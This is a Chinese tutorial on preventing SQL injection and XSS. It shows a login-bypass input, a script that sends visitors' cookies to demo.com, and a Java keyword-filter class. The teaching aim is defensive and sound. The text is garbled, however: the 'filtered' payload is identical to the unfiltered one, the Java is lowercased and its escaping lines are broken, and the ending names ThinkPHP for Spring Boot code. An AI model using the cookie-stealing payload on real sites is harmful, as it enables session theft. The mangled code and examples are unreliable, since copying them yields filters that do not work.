sql注入简介
sql 注入漏洞(sql injection)是 web 开发中最常见的一种安全漏洞。可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限。
而造成 sql 注入的原因是因为程序没有有效的转义过滤用户的输入,使攻击者成功的向服务器提交恶意的 sql 查询代码,程序在接收后错误的将攻击者的输入作为查询语句的一部分执行,导致原始的查询逻辑被改变,额外的执行了攻击者精心构造的恶意代码。
很多 web 开发者没有意识到 sql 查询是可以被篡改的,从而把 sql 查询当作可信任的命令。殊不知,sql 查询是可以绕开访问控制,从而绕过身份验证和权限检查的。更有甚者,有可能通过 sql 查询去运行主机系统级的命令。
sql 注入原理
下面将通过一些真实的例子来详细讲解 sql 注入的方式的原理。
考虑以下简单的管理员登录表单:
<form action="/login" method="post"> <p>username: <input type="text" name="username" /></p> <p>password: <input type="password" name="password" /></p> <p><input type="submit" value="登陆" /></p></form>
后端的 sql 语句可能是如下这样的:
let querysql = ` select * from user where username='${username}' and psw='${password}'`;// 接下来就是执行 sql 语句
目的就是来验证用户名和密码是不是正确,按理说乍一看上面的 sql 语句也没什么毛病,确实是能够达到我们的目的,可是你只是站在用户会老老实实按照你的设计来输入的角度来看问题,如果有一个恶意攻击者输入的用户名是 zhangsan’ or 1 = 1 --,密码随意输入,就可以直接登入系统了。
冷静下来思考一下,我们之前预想的真实 sql 语句是:
select * from user where username='zhangsan' and psw='mypassword'
可以恶意攻击者的奇怪用户名将你的 sql 语句变成了如下形式:
select * from user where username='zhangsan' or 1 = 1 --' and psw='xxxx'
在 sql 中,-- 是注释后面的内容的意思,所以查询语句就变成了:
select * from user where username='zhangsan' or 1 = 1
这条 sql 语句的查询条件永远为真,所以意思就是恶意攻击者不用我的密码,就可以登录进我的账号,然后可以在里面为所欲为,然而这还只是最简单的注入,牛逼的 sql 注入高手甚至可以通过 sql 查询去运行主机系统级的命令,将你主机里的内容一览无余,这里我也没有这个能力讲解的太深入,毕竟不是专业研究这类攻击的,但是通过以上的例子,已经了解了 sql 注入的原理,我们基本已经能找到防御 sql 注入的方案了。
相关推荐:《thinkphp教程》
预防 sql 注入
防止 sql 注入主要是不能允许用户输入的内容影响正常的 sql 语句的逻辑,当用户的输入的信息将要用来拼接 sql 语句的话,我们应该永远选择不相信,任何内容都必须进行转义过滤,当然做到这个还是不够的,下面列出防御 sql 注入的几点注意事项:
1、严格限制web应用的数据库的操作权限,给此用户提供仅仅能够满足其工作的最低权限,从而最大限度的减少注入攻击对数据库的危害。
2、后端代码检查输入的数据是否符合预期,严格限制变量的类型,例如使用正则表达式进行一些匹配处理。
3、对进入数据库的特殊字符(’,",\,<,>,&,*,; 等)进行转义处理,或编码转换。基本上所有的后端语言都有对字符串进行转义处理的方法,比如 lodash 的 lodash._escapehtmlchar 库。
4、所有的查询语句建议使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到 sql 语句中,即不要直接拼接 sql 语句。例如 node.js 中的 mysqljs 库的 query 方法中的 ? 占位参数。
mysql.query(`select * from user where username = ? and psw = ?`, [username, psw]);
5、在应用发布之前建议使用专业的 sql 注入检测工具进行检测,以及时修补被发现的 sql 注入漏洞。网上有很多这方面的开源工具,例如 sqlmap、sqlninja 等。
6、避免网站打印出 sql 错误信息,比如类型错误、字段不匹配等,把代码里的 sql 语句暴露出来,以防止攻击者利用这些错误信息进行 sql 注入。
7、不要过于细化返回的错误信息,如果目的是方便调试,就去使用后端日志,不要在接口上过多的暴露出错信息,毕竟真正的用户不关心太多的技术细节,只要话术合理就行。
xss 攻击简介
xss 攻击,即跨站脚本攻击(cross site scripting),它是 web 程序中常见的漏洞。 原理是攻击者往 web 页面里插入恶意的脚本代码(css代码、javascript代码等),当用户浏览该页面时,嵌入其中的脚本代码会被执行,从而达到恶意攻击用户的目的。如盗取用户cookie,破坏页面结构、重定向到其他网站等。
理论上来说,web 页面中所有可由用户输入的地方,如果没有对输入的数据进行过滤处理的话,都会存在 xss 漏洞;当然,我们也需要对模板视图中的输出数据进行过滤。
xss 攻击示例
有一个博客网站,提供了一个 web 页面(内含表单)给所有的用户发表博客,但该博客网站的开发人员并没有对用户提交的表单数据做任何过滤处理。 现在,我是一个攻击者,在该博客网站发表了一篇博客,用于盗取其他用户的cookie信息。博客内容如下:
<b>this is a xss test!</b><script>var cookie = document.cookie;window.open("http://demo.com/getcookie.php?param="+cookie);</script>
这是一段 xss 攻击代码。当其他用户查看我的这篇博客时,他们的 cookie 信息就会被发送至我的 web 站点(http://demo.com/) ,如此,我就盗取了其他用户的 cookie 信息。
预防 xss 攻击
核心思想
永远不要相信用户的输入,必须对输入的数据作过滤处理。
该函数会把字符串中的特殊字符转化为 html 实体,这样在输出时,恶意的代码就无法执行了。这些特殊字符主要是 ’ " & < >。
比如,我刚刚的恶意代码被过滤后,会变为下面的代码:
<b>this is a xss test!</b><script>var cookie = document.cookie;window.open("http://demo.com/getcookie.php?param="+cookie);</script>
这样,就可以预防大部分 xss 攻击了。
服务端代码处理
以springboot为例:
可利用过滤器进行设置,如下所示:
/** * 防止sql注入,xss攻击 * 前端可以对输入信息做预处理,后端也可以做处理。 */public class xsshttpservletrequestwrapper extends httpservletrequestwrapper { private final logger log = loggerfactory.getlogger(getclass()); private static string key = "and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char |declare|;|or|-|+"; private static set<string> notallowedkeywords = new hashset<string>(0); private static string replacedstring="invalid"; static { string keystr[] = key.split("\\|"); for (string str : keystr) { notallowedkeywords.add(str); } } private string currenturl; public xsshttpservletrequestwrapper(httpservletrequest servletrequest) { super(servletrequest); currenturl = servletrequest.getrequesturi(); } /**覆盖getparameter方法,将参数名和参数值都做xss过滤。 * 如果需要获得原始的值,则通过super.getparametervalues(name)来获取 * getparameternames,getparametervalues和getparametermap也可能需要覆盖 */ @override public string getparameter(string parameter) { string value = super.getparameter(parameter); if (value == null) { return null; } return cleanxss(value); } @override public string[] getparametervalues(string parameter) { string[] values = super.getparametervalues(parameter); if (values == null) { return null; } int count = values.length; string[] encodedvalues = new string[count]; for (int i = 0; i < count; i++) { encodedvalues[i] = cleanxss(values[i]); } return encodedvalues; } @override public map<string, string[]> getparametermap(){ map<string, string[]> values=super.getparametermap(); if (values == null) { return null; } map<string, string[]> result=new hashmap<>(); for(string key:values.keyset()){ string encodedkey=cleanxss(key); int count=values.get(key).length; string[] encodedvalues = new string[count]; for (int i = 0; i < count; i++){ encodedvalues[i]=cleanxss(values.get(key)[i]); } result.put(encodedkey,encodedvalues); } return result; } /** * 覆盖getheader方法,将参数名和参数值都做xss过滤。 * 如果需要获得原始的值,则通过super.getheaders(name)来获取 * getheadernames 也可能需要覆盖 */ @override public string getheader(string name) { string value = super.getheader(name); if (value == null) { return null; } return cleanxss(value); } private string cleanxss(string valuep) { // you'll need to remove the spaces from the html entities below string value = valuep.replaceall("<", "<").replaceall(">", ">"); value = value.replaceall("<", "& lt;").replaceall(">", "& gt;"); value = value.replaceall("\\(", "& #40;").replaceall("\\)", "& #41;"); value = value.replaceall("'", "& #39;"); value = value.replaceall("eval\\((.*)\\)", ""); value = value.replaceall("[\\\"\\\'][\\s]*javascript:(.*)[\\\"\\\']", "\"\""); value = value.replaceall("script", ""); value = cleansqlkeywords(value); return value; } private string cleansqlkeywords(string value) { string paramvalue = value; for (string keyword : notallowedkeywords) { if (paramvalue.length() > keyword.length() + 4 && (paramvalue.contains(" "+keyword)||paramvalue.contains(keyword+" ")||paramvalue. contains(" "+keyword+" "))) { paramvalue = stringutils.replace(paramvalue, keyword, replacedstring); log.error(this.currenturl + "已被过滤,因为参数中包含不允许sql的关键词(" + keyword + ")"+";参数:"+value+";过滤后的参数:"+paramvalue); } } return paramvalue; }}
以上就是thinkphp如何防止sql注入xss攻击的详细内容。